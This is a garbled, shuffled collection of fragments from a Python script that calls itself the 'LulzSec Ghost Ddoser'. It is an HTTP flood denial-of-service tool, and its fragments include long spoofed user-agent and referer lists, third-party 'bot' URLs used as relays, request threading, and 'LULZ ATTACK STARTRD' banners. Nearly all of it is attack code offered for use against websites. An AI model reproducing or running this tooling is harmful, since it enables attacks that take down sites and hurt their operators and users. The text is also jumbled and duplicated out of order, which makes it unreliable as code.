headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)')", "Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Android; Mobile; rv:18.0) Gecko/18.0 Firefox/18.0')", "e.code set_flag(1) print '[+]~>LULZ ATTACK STARTRD<~' print '[+]~~>LULZ ATTACK STARTRD<~~[+] ' code=500 except", "(PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/0.9.3) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows", "print \\ \"\"\" . _____|\\ _.--| LOL |: <____|.----|| .---''---, The ;..__..' _...", "headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 By +(www.21seek.com A Real", "headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)') headers_useragents.append('AlertInfo 2.0 (Powered by Newsbrain)') headers_useragents.append('AlkalineBOT/1.3') headers_useragents.append('AlkalineBOT/1.4 (1.4.0326.0 RTM)') headers_useragents.append('Allesklar/0.1", "Danger hiptop 1.0)') headers_useragents.append('DoCoMo/1.0/P502i/c10 (Google CHTML Proxy/1.0)') headers_useragents.append('DoCoMo/2.0 SH901iC(c100;TB;W24H12)') headers_useragents.append('DoCoMo/1.0/N503is/c10') headers_useragents.append('KDDI-KC31 UP.Browser/6.2.0.5 (GUI)')", "NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (PlayStation 4 1.52)", "< 2: usage() sys.exit() else: if sys.argv[1]==\"help\": usage() sys.exit() else: print \"Script Priv8", "InfoPath.2)') headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE", "headers_useragents.append('AnnoMille spider 0.1 alpha - http://www.annomille.it') headers_useragents.append('annotate_google; http://ponderer.org/download/annotate_google.user.js') headers_useragents.append('Anonymized by ProxyOS: http://www.megaproxy.com') headers_useragents.append('Anonymizer/1.1')", "bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") return(bots) #builds random ascii string def buildblock(size): out_str = ''", "Galaxy Nexus Build/ICL53F)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Android; Tablet;", "InfoPath.2)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727;", "BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3", "headers_useragents.append('AtlocalBot/1.1 +(http://www.atlocal.com/local-web-site-owner.html)') headers_useragents.append('Atomic_Email_Hunter/4.0') headers_useragents.append('Atomz/1.0') headers_useragents.append('atSpider/1.0') headers_useragents.append('Attentio/Nutch-0.9-dev (Attentios beta blog crawler; www.attentio.com; <EMAIL>)') headers_useragents.append('AU-MIC/2.0", "e: #print e.code set_flag(1) print '[+]~>LULZ ATTACK STARTRD<~' print '[+]~~>LULZ ATTACK STARTRD<~~[+] '", "amaya/5.4.0') headers_useragents.append('amaya/11.1 amaya/5.4.0') headers_useragents.append('Cocoal.icio.us/1.0 (v43) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v40) (Mac OS", "sys.argv[1] if url.count(\"/\")==2: url = url + \"/\" m = re.search('http\\://([^/]*)/?.*', url) host", "headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; fr-fr; MIDC41') headers_useragents.append('Build/IML74K) AppleWebKit/534.30 (KHTML,", "'/') return(headers_referers) def bots(): global bots bots=[] bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\")", "2.2; fr-fr; Desire_A8181 Build/FRF91)') headers_useragents.append('App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Linux;", "headers_useragents.append('Acoon Robot v1.50.001') headers_useragents.append('Acoon Robot v1.52 (http://www.acoon.de)') headers_useragents.append('Acoon-Robot 4.0.x.[xx] (http://www.acoon.de)') headers_useragents.append('Acoon-Robot v3.xx (http://www.acoon.de", "print 'LulzSec Ghost Ddoser By V3I0p3r' print 'Script Priv8 Privada da LulzSec Ghost'", "headers_useragents.append('amaya/10 libwww/5.4.0') headers_useragents.append('amaya/9.55 libwww/5.4.0') headers_useragents.append('amaya/9.54 libwww/5.4.0') headers_useragents.append('amaya/9.52 libwww/5.4.0') headers_useragents.append('amaya/9.51 libwww/5.4.0') headers_useragents.append('amaya/8.8.5 libwww/5.4.0') headers_useragents.append('amaya/11.2", "headers_useragents.append('Amfibibot/0.06 (Amfibi Web Search; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('Amfibibot/0.07 (Amfibi Robot; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('amibot') headers_useragents.append('Amiga-AWeb/3.4.167SE')", "keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World Cup') keyword_top.append('Ca Si Le Roi') keyword_top.append('Ebola') keyword_top.append('Malaysia Airlines Flight", "| `| : `' ,' `. / |`-:_ ; | | | :", "headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')", "useragent_list(): global headers_useragents headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like", "http://www.zipcommander.com/') headers_useragents.append('2Bone_LinkChecker/1.0 libwww-perl/5.64') headers_useragents.append('4anything.com LinkChecker v2.0') headers_useragents.append('8484 Boston Project v 1.0') headers_useragents.append(':robot/1.0 (linux)", "SL-C750/1.0,Embedix/Qtopia/1.3.0) NetFront/3.0 Zaurus C750') headers_useragents.append('WM5 PIE') headers_useragents.append('Xiino/1.0.9E [en] (v. 4.1; 153x130; g4)') headers_useragents.append('Mozilla/5.0", "U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610') headers_useragents.append('Minimo/0.016') headers_useragents.append('OPWV-SDK UP.Browser/7.0.2.3.119 (GUI) MMP/2.0 Push/PO') headers_useragents.append('UP.Browser/6.1.0.1.140", "Nexus Build/ICL53F)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Android; Tablet; rv:18.0)", "random.randint(65, 90) out_str += chr(a) return(out_str) def usage(): print 'Pra usar python Lulz.py", ";`-._; __..--'; : : / ( ;|;-./_ _/.-:'o | / ' | /", "user agent array def useragent_list(): global headers_useragents headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1;", "Galaxy S5') keyword_top.append('Nexus 6') keyword_top.append('Moto G') keyword_top.append('Samsung Note 4') keyword_top.append('LG G3') keyword_top.append('Xbox One')", "urllib2.HTTPError, e: #print e.code set_flag(1) print '[+]~>LULZ ATTACK STARTRD<~' print '[+]~~>LULZ ATTACK STARTRD<~~[+]", ". ,' :: /`-._| | | || ' : `.`.) _,' |;._:: |", "3.4; U; AvantGo 3.2)') headers_useragents.append('Mozilla/3.0 (compatible; AvantGo 3.2)') headers_useragents.append(' Mozilla/5.0 (compatible; AvantGo 3.2;')", "headers_useragents.append('amaya/11.2 libwww/5.4.0') headers_useragents.append('amaya/11.1 libwww/5.4.0') headers_useragents.append('amaya/10.1 libwww/5.4.0') headers_useragents.append('amaya/10 libwww/5.4.0') headers_useragents.append('amaya/9.55 libwww/5.4.0') headers_useragents.append('amaya/9.54 libwww/5.4.0') headers_useragents.append('amaya/9.52", "headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') # generates a Keyword list def", "undefined http://www.neofonie.de/loesungen/search/robot.html )') headers_useragents.append('A-Online Search') headers_useragents.append('A1 Keyword Research/1.0.2 (+http://www.micro-sys.dk/products/keyword-research/) miggibot/2007.03.27') headers_useragents.append('A1 Sitemap Generator/1.0", "10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; Win64; x64)", "10_6_3; en-us)') headers_useragents.append('AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/1.22 (compatible;", "while flag==0: if (previous+500<request_counter) & (previous<>request_counter): print \"%d lULZ Up\" % (request_counter) previous=request_counter", "(Nutch; http://www.simpy.com/bot.html; feedback at simpy dot com)') headers_useragents.append('Arikus_Spider') headers_useragents.append('Arquivo-web-crawler (compatible; heritrix/1.12.1 +http://arquivo-web.fccn.pt)') headers_useragents.append('ASAHA", "|: <____|.----|| .---''---, The ;..__..' _... Lulz ,'/ ;|/..--'' \\ Boat ,'_/.-/': :", "e.reason sys.exit() else: inc_counter() urllib2.urlopen(request) return(code) #http caller thread class HTTPThread(threading.Thread): def run(self):", "+http://arquivo-web.fccn.pt)') headers_useragents.append('ASAHA Search Engine Turkey V.001 (http://www.asaha.com/)') headers_useragents.append('Asahina-Antenna/1.x') headers_useragents.append('Asahina-Antenna/1.x (libhina.pl/x.x ; libtime.pl/x.x)') headers_useragents.append('ask.24x.info')", "(+http://www.micro-sys.dk/products/keyword-research/) miggibot/2007.03.27') headers_useragents.append('A1 Sitemap Generator/1.0 (+http://www.micro-sys.dk/products/sitemap-generator/) miggibot/2006.01.24') headers_useragents.append('AbachoBOT') headers_useragents.append('AbachoBOT (Mozilla compatible)') headers_useragents.append('ABCdatos BotLink/5.xx.xxx#BBL')", "import random import re #global params url='' host='' headers_useragents=[] headers_referers=[] request_counter=0 flag=0 safe=0", "set_flag(1) print '[+]~>LULZ ATTACK STARTRD<~' print '[+]~~>LULZ ATTACK STARTRD<~~[+] ' code=500 except urllib2.URLError,", "XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1", "(KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Galaxy Nexus Build/JOP40D)')", "STARTRD<~' print '[+]~~>LULZ ATTACK STARTRD<~~[+] ' code=500 except urllib2.URLError, e: #print e.reason sys.exit()", "Gecko) Chrome/37.0.2049.0 Safari/537.36') # generates a referer array def referer_list(): global headers_referers headers_referers.append('http://www.google.com/?q=')", "keyword_top keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World Cup') keyword_top.append('Ca Si Le Roi') keyword_top.append('Ebola') keyword_top.append('Malaysia", "(xxx)') headers_useragents.append('Ad Muncher v4.xx.x') headers_useragents.append('Ad Muncher v4x Build xxxxx') headers_useragents.append('Adaxas Spider (http://www.adaxas.net/)') headers_useragents.append('Advanced", ": _..-'''/ / | \\ \\ _|/| \\ /-./_ \\; \\ \\,;' \\", "headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.2; en-us; Galaxy", "at accoonabot dot com)') headers_useragents.append('Ace Explorer') headers_useragents.append('Ack (http://www.ackerm.com/)') headers_useragents.append('AcoiRobot') headers_useragents.append('Acoon Robot v1.50.001') headers_useragents.append('Acoon", "(http://gsitecrawler.com/)') headers_useragents.append('iTunes/9.1.1') headers_useragents.append('iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)') headers_useragents.append('iTunes/9.0.3') headers_useragents.append('iTunes/9.0.2", "headers_useragents.append('AltaVista Intranet V2.0 Compaq Altavista Eval <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 evreka.com <EMAIL>') headers_useragents.append('AltaVista", "PPC; 240x320)') headers_useragents.append('Mozilla/2.0 (compatible; MSIE 3.02;') headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/5.0 (X11; U;", "Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36') headers_useragents.append('Mozilla/5.0 (X11; Linux", "Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Nexus 10 Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML,", "Explay Surfer 7.02 Build/ICS.g12refM703A1HZ1.20121009) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android", "(KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like", "headers_useragents.append('Avant Browser (http://www.avantbrowser.com)') headers_useragents.append('AVSearch-1.0(<EMAIL>)') headers_useragents.append('AVSearch-2.0-fusionIdx-14-CompetitorWebSites') headers_useragents.append('AVSearch-3.0(AltaVista/AVC)') headers_useragents.append('AWeb') headers_useragents.append('axadine/ (Axadine Crawler; http://www.axada.de/; )') headers_useragents.append('AxmoRobot", "indexing on www.axmo.com search engine.') headers_useragents.append('Azureus 2.x.x.x') headers_useragents.append('BabalooSpider/1.3 (BabalooSpider; http://www.babaloo.si; <EMAIL>)') headers_useragents.append('BaboomBot/1.x.x (+http://www.baboom.us)')", "headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Android; Mobile; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1;", "|`-:_ ; | | | : \\ `--. ) /|-._: : | \\", "(Windows; U; MSIE 7.0; Windows NT 6.0; en-US)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows", "Privada da LulzSec Ghost\" if len(sys.argv)== 3: if sys.argv[2]==\"safe\": set_safe() url = sys.argv[1]", "fr-fr; MIDC41') headers_useragents.append('Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android", "SA/0001JP Profile/MIDP-1.0') headers_useragents.append('Mozilla/3.0(DDIPOCKET;JRC/AH-J3001V,AH-J3002V/1.0/0100/c50)CNF/2.0') headers_useragents.append('PDXGW/1.0') headers_useragents.append('ASTEL/1.0/J-0511.00/c10/smel') headers_useragents.append('Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3;", "' code=500 except urllib2.URLError, e: #print e.reason sys.exit() else: inc_counter() urllib2.urlopen(request) return(code) #http", "Android 4.2.1; Nexus 10 Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux;", "Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2;", "headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.bing.com/search?q=') headers_referers.append('http://search.yahoo.com/search?p=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=') headers_referers.append('http://hksearch.timway.com/search.php?query=') headers_referers.append('http://find.ezilon.com/search.php?q=')", "threading import random import re #global params url='' host='' headers_useragents=[] headers_referers=[] request_counter=0 flag=0", "headers_useragents.append('W3C_Validator/1.654') headers_useragents.append('W3C_Validator/1.606') headers_useragents.append('W3C_Validator/1.591') headers_useragents.append('W3C_Validator/1.575') headers_useragents.append('W3C_Validator/1.555') headers_useragents.append('W3C_Validator/1.432.2.5') headers_useragents.append('W3C_Validator/1.432.2.22') headers_useragents.append('W3C_Validator/1.432.2.19') headers_useragents.append('W3C_Validator/1.432.2.10') headers_useragents.append('W3C_Validator/1.305.2.12 libwww-perl/5.64') headers_useragents.append('WDG_Validator/1.6.2') headers_useragents.append('amaya/11.3.1", "- Crawling your site for better indexing on www.axmo.com search engine.') headers_useragents.append('Azureus 2.x.x.x')", "(www.nearsoftware.com)') headers_useragents.append('Allrati/1.1 (+)') headers_useragents.append('AltaVista Intranet V2.0 AVS EVAL <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 Compaq", "Mozilla/5.0 (Linux; Android 4.2.1; Nexus 4 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Linux;", "V2.0 evreka.com <EMAIL>') headers_useragents.append('AltaVista V2.0B <EMAIL>') headers_useragents.append('amaya/x.xx libwww/x.x.x') headers_useragents.append('AmfibiBOT') headers_useragents.append('Amfibibot/0.06 (Amfibi Web Search;", "if (code==800) & (safe==1): set_flag(2) except Exception, ex: pass # monitors http threads", "(KHTML, like Gecko) Version/5.0 Safari/533.16') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/1.22 (compatible; MSIE 5.01;') headers_useragents.append('PalmOS", "(KHTML, like Gecko)') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like", "headers_useragents.append('Balihoo/Nutch-1.0-dev (Crawler for Balihoo.com search engine - obeys robots.txt and robots meta tags", "NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534') headers_useragents.append('Mozilla/5.0 (Windows; U;", "CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (PlayStation 4 1.52) AppleWebKit/536.26 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Windows NT", "headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; A500 Build/HRI66)') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64)') headers_useragents.append('Mozilla/5.0", "http://www.annomille.it') headers_useragents.append('annotate_google; http://ponderer.org/download/annotate_google.user.js') headers_useragents.append('Anonymized by ProxyOS: http://www.megaproxy.com') headers_useragents.append('Anonymizer/1.1') headers_useragents.append('AnswerBus (http://www.answerbus.com/)') headers_useragents.append('AnswerChase PROve x.0')", "headers_useragents.append('amaya/9.51 libwww/5.4.0') headers_useragents.append('amaya/8.8.5 libwww/5.4.0') headers_useragents.append('amaya/11.2 amaya/5.4.0') headers_useragents.append('amaya/11.1 amaya/5.4.0') headers_useragents.append('Cocoal.icio.us/1.0 (v43) (Mac OS X;", "[en] (v. 4.1; 153x130; g4)') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.2.1; en-gb; A501 Build/HTK55D)')", "(Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v40) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v38) (Mac", "like Gecko) Chrome/37.0.2062.124 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like", "headers_useragents.append('amaya/11.2 amaya/5.4.0') headers_useragents.append('amaya/11.1 amaya/5.4.0') headers_useragents.append('Cocoal.icio.us/1.0 (v43) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v40) (Mac", "Search; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('Amfibibot/0.07 (Amfibi Robot; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('amibot') headers_useragents.append('Amiga-AWeb/3.4.167SE') headers_useragents.append('AmigaVoyager/3.4.4 (MorphOS/PPC native)')", "bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\")", "Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Galaxy Nexus Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166", "python Lulz.py <url>' print 'LulzSec Ghost Ddoser By V3I0p3r' print 'Script Priv8 Privada", "(Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 By +(www.21seek.com", "Desire_A8181 Build/FRF91)') headers_useragents.append('App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Linux; U; Android", "array def referer_list(): global headers_referers headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.bing.com/search?q=') headers_referers.append('http://search.yahoo.com/search?p=')", "/ / :_| ;`-._; __..--'; : : / ( ;|;-./_ _/.-:'o | /", "re #global params url='' host='' headers_useragents=[] headers_referers=[] request_counter=0 flag=0 safe=0 def inc_counter(): global", "headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') # generates a Keyword list def keyword_list(): global keyword_top keyword_top.append('Ecosistema') keyword_top.append('Suicide')", "like Gecko) Chrome/37.0.2049.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)", "headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') # generates a", "libwww/5.4.0') headers_useragents.append('amaya/9.55 libwww/5.4.0') headers_useragents.append('amaya/9.54 libwww/5.4.0') headers_useragents.append('amaya/9.52 libwww/5.4.0') headers_useragents.append('amaya/9.51 libwww/5.4.0') headers_useragents.append('amaya/8.8.5 libwww/5.4.0') headers_useragents.append('amaya/11.2 amaya/5.4.0')", "Build/HTK55D)') headers_useragents.append('Opera/9.80 (Android 3.2.1; Linux; Opera') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; A500", "x.0') headers_useragents.append('ANTFresco/x.xx') headers_useragents.append('antibot-V1.1.5/i586-linux-2.2') headers_useragents.append('AnzwersCrawl/2.0 (<EMAIL>;Engine)') headers_useragents.append('Apexoo Spider 1.x') headers_useragents.append('Aplix HTTP/1.0.1') headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x", "artificial intelligence search engine China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; a<EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot", "headers_useragents.append('aranhabot') headers_useragents.append('ArchitextSpider') headers_useragents.append('archive.org_bot') headers_useragents.append('Argus/1.1 (Nutch; http://www.simpy.com/bot.html; feedback at simpy dot com)') headers_useragents.append('Arikus_Spider') headers_useragents.append('Arquivo-web-crawler", "META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; fr-fr; MIDC41') headers_useragents.append('Build/IML74K) AppleWebKit/534.30 (KHTML, like", "Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36') headers_useragents.append('Mozilla/5.0 (X11;", "G') keyword_top.append('Samsung Note 4') keyword_top.append('LG G3') keyword_top.append('Xbox One') keyword_top.append('Apple Watch') keyword_top.append('Nokia X') keyword_top.append('Ipad", "6.1; Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)')", "(KHTML, like Gecko) Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; ru-ru; Explay", "headers_useragents.append('Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1') headers_useragents.append('J-PHONE/5.0/V801SA/SN123456789012345 SA/0001JP Profile/MIDP-1.0') headers_useragents.append('Mozilla/3.0(DDIPOCKET;JRC/AH-J3001V,AH-J3002V/1.0/0100/c50)CNF/2.0') headers_useragents.append('PDXGW/1.0') headers_useragents.append('ASTEL/1.0/J-0511.00/c10/smel') headers_useragents.append('Mozilla/5.0 (Macintosh; U; Intel Mac", "headers_useragents.append('ask.24x.info') headers_useragents.append('AskAboutOil/0.06-rcp (Nutch; http://www.nutch.org/docs/en/bot.html; nutch-agent@<EMAIL>)') headers_useragents.append('asked/Nutch-0.8 (web crawler; http://asked.jp; epicurus at gmail dot", "NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36') # generates a referer", "\\ \"\"\" . _____|\\ _.--| LOL |: <____|.----|| .---''---, The ;..__..' _... Lulz", "keyword_top.append('<NAME>') keyword_top.append('World Cup') keyword_top.append('Ca Si Le Roi') keyword_top.append('Ebola') keyword_top.append('Malaysia Airlines Flight 370') keyword_top.append('ALS", "headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=') headers_referers.append('http://hksearch.timway.com/search.php?query=') headers_referers.append('http://find.ezilon.com/search.php?q=') headers_referers.append('http://www.sogou.com/web?query=')", "(KHTML, like Gecko)') 